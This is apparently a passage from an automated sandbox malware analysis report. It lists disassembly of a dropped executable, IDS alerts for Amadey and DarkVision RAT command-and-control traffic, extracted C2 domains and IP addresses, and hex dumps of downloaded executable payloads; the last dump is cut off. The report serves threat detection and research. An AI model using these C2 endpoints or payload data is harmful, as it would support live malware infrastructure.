                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then mov byte ptr [edi], cl17_2_004364FA
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h17_2_00430C93
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then mov dword ptr [esi+04h], ecx17_2_0041CC9C
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-260B3612h]17_2_0040D4A0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]17_2_004334A0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then mov byte ptr [esi], cl17_2_004364A5
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then mov byte ptr [edi], cl17_2_004364A5
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx-77161D9Ah]17_2_0042CD41
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then mov byte ptr [ecx], al17_2_00437D7B
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then mov byte ptr [esi], cl17_2_00436509
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then mov byte ptr [edi], cl17_2_00436509
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then jmp eax17_2_0042CD30
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 743EDB10h17_2_0044DD30
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+3Ch]17_2_004325C0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-5CE8416Dh]17_2_0040C5D0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then mov dword ptr [esi+04h], edx17_2_0041E5D2
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then movsx ecx, byte ptr [esi+eax]17_2_0041A650
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx-77161D9Ah]17_2_0042DE29
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then movzx eax, byte ptr [esp+ebp+2E02BCA2h]17_2_00431681
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+esi]17_2_00402760
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then xor edx, edx17_2_0040F775
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then mov byte ptr [edi], al17_2_00437F16
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+1FFE9D9Ch]17_2_0041BFCF
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+73E85C6Ah]17_2_0044EFD0
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then movzx ecx, byte ptr [edi+eax-35750D96h]17_2_0041D7FB
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h17_2_0041D7FB
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then movsx ecx, byte ptr [ebp+edi+00h]17_2_0044CF80
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CA198B66h17_2_00445FA0

                          Networking

                          barindex
                          Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:61658 -> 176.113.115.6:80
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:61691 -> 82.29.67.160:443
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:61698 -> 82.29.67.160:443
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:61706 -> 82.29.67.160:443
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:61733 -> 82.29.67.160:443
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:61735 -> 82.29.67.160:443
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:61739 -> 82.29.67.160:443
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:61741 -> 82.29.67.160:443
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:61745 -> 82.29.67.160:443
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:61750 -> 82.29.67.160:443
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:61747 -> 82.29.67.160:443
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:61754 -> 82.29.67.160:443
                          Source: Malware configuration extractorURLs: citydisco.bet/gdJIS
                          Source: Malware configuration extractorURLs: featureccus.shop/bdMAn
                          Source: Malware configuration extractorURLs: mrodularmall.top/aNzS
                          Source: Malware configuration extractorURLs: jowinjoinery.icu/bdWUa
                          Source: Malware configuration extractorURLs: legenassedk.top/bdpWO
                          Source: Malware configuration extractorURLs: htardwarehu.icu/Sbdsa
                          Source: Malware configuration extractorURLs: cjlaspcorne.icu/DbIps
                          Source: Malware configuration extractorURLs: bugildbett.top/bAuz
                          Source: Malware configuration extractorIPs: 176.113.115.6
                          Source: Malware configuration extractorIPs: 82.29.67.160
                          Source: global trafficTCP traffic: 192.168.2.6:61651 -> 162.159.36.2:53
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 13 Mar 2025 07:08:10 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 12 Mar 2025 21:19:41 GMTETag: "1fda00-6302bc37b67d3"Accept-Ranges: bytesContent-Length: 2087424Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 32 34 d0 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 cc 04 00 00 ac 00 00 00 00 00 00 00 d0 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 4a 00 00 04 00 00 33 23 20 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 00 06 00 6b 00 00 00 00 f0 05 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 01 06 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 e0 05 00 00 10 00 00 00 e0 05 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 01 00 00 00 f0 05 00 00 02 00 00 00 f0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 00 06 00 00 02 00 00 00 f2 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 f0 29 00 00 10 06 00 00 02 00 00 00 f4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 78 79 76 72 66 6b 71 00 c0 19 00 00 00 30 00 00 be 19 00 00 f6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 76 61 69 6d 76 69 6d 00 10 00 00 00 c0 49 00 00 04 00 00 00 b4 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 49 00 00 22 00 00 00 b8 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 13 Mar 2025 07:08:17 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 12 Mar 2025 13:21:57 GMTETag: "150e00-6302516f10fba"Accept-Ranges: bytesContent-Length: 1379840Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 b6 9b d0 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 9c 08 00 00 fe 00 00 00 00 00 00 82 e6 06 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 15 00 00 08 00 00 00 00 00 00 03 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 30 36 09 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9e 09 00 40 45 00 00 00 a0 09 00 5c 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 fb 08 00 18 00 00 00 98 bf 08 00 c0 00 00 00 00 00 00 00 00 00 00 00 c0 37 09 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 9a 08 00 00 10 00 00 00 9c 08 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 a0 00 00 00 b0 08 00 00 a2 00 00 00 a4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 5c 2c 00 00 00 60 09 00 00 16 00 00 00 46 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 09 00 00 00 00 90 09 00 00 02 00 00 00 5c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 5c 43 00 00 00 a0 09 00 00 44 00 00 00 5e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 94 05 00 00 f0 09 00 00 94 05 00 00 a2 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 00 94 05 00 00 90 0f 00 00 94 05 00 00 36 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 13 Mar 2025 07:08:23 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Tue, 11 Mar 2025 22:36:47 GMTETag: "14da00-63018b956a2b5"Accept-Ranges: bytesContent-Length: 1366528Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 b6 9b d0 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 9c 08 00 00 fe 00 00 00 00 00 00 82 e6 06 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 14 00 00 08 00 00 00 00 00 00 03 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 30 36 09 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9e 09 00 40 45 00 00 00 a0 09 00 5c 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 fb 08 00 18 00 00 00 98 bf 08 00 c0 00 00 00 00 00 00 00 00 00 00 00 c0 37 09 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 9a 08 00 00 10 00 00 00 9c 08 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 a0 00 00 00 b0 08 00 00 a2 00 00 00 a4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 5c 2c 00 00 00 60 09 00 00 16 00 00 00 46 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 09 00 00 00 00 90 09 00 00 02 00 00 00 5c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 5c 43 00 00 00 a0 09 00 00 44 00 00 00 5e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 7a 05 00 00 f0 09 00 00 7a 05 00 00 a2 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 00 7a 05 00 00 70 0f 00 00 7a 05 00 00 1c 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Thu, 13 Mar 2025 07:08:30 GMTContent-Type: application/octet-streamContent-Length: 1363456Last-Modified: Wed, 12 Mar 2025 07:35:33 GMTConnection: keep-aliveETag: "67d13945-14ce00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 a3 77 4c 67 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 22 03 00 00 72 06 00 00 00 00 00 05 36 24 00 00 10 00 00 00 40 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 29 00 00 04 00 00 00 00 00 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 43 24 00 89 01 00 00 94 87 24 00 64 00 00 00 00 30 28 00 a4 57 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 2c 28 00 40 00 00 00 00 00 00 00 00 00 00 00 00 b0 14 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a9 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 19 98 00 00 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 40 3f 04 00 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 73 73 30 00 00 00 00 00 2d 82 0c 00 00 20 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 73 73 31 00 00 00 00 00 38 00 00 00 00 b0 14 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 73 73 32 00 00 00 00 00 60 6e 13 00 00 c0 14 00 00 70 13 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 a4 57 01 00 00 30 28 00 00 58 01 00 00 76 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 13 Mar 2025 07:08:36 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 12 Mar 2025 23:21:04 GMTETag: "bdb40-6302d7596d057"Accept-Ranges: bytesContent-Length: 777024Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 1f bf d1 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 2e 05 00 00 e2 00 00 00 00 00 00 d2 77 03 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 0b 00 00 06 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 c6 05 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 96 0b 00 40 45 00 00 00 30 06 00 6c 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 8b 05 00 18 00 00 00 98 4f 05 00 c0 00 00 00 00 00 00 00 00 00 00 00 c0 c7 05 00 48 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 2c 05 00 00 10 00 00 00 2e 05 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 24 a1 00 00 00 40 05 00 00 a2 00 00 00 34 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2c 00 00 00 f0 05 00 00 16 00 00 00 d6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 09 00 00 00 00 20 06 00 00 02 00 00 00 ec 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 6c 27 00 00 00 30 06 00 00 28 00 00 00 ee 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 80 05 00 00 60 06 00 00 80 05 00 00 16 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Thu, 13 Mar 2025 07:08:39 GMTContent-Type: application/octet-streamContent-Length: 1846784Last-Modified: Mon, 10 Mar 2025 14:56:45 GMTConnection: keep-aliveETag: "67cefdad-1c2e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 14 fa ce 67 00 00 00 00 00 00 00 00 f0 00 23 00 0b 02 09 00 00 ba 00 00 00 fc 18 00 00 00 00 00 2d ba 25 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 80 3f 00 00 04 00 00 00 00 00 00 02 00 00 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a8 82 2d 00 3c 00 00 00 00 00 00 00 00 00 00 00 40 45 3f 00 90 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 23 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c2 b9 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 44 2a 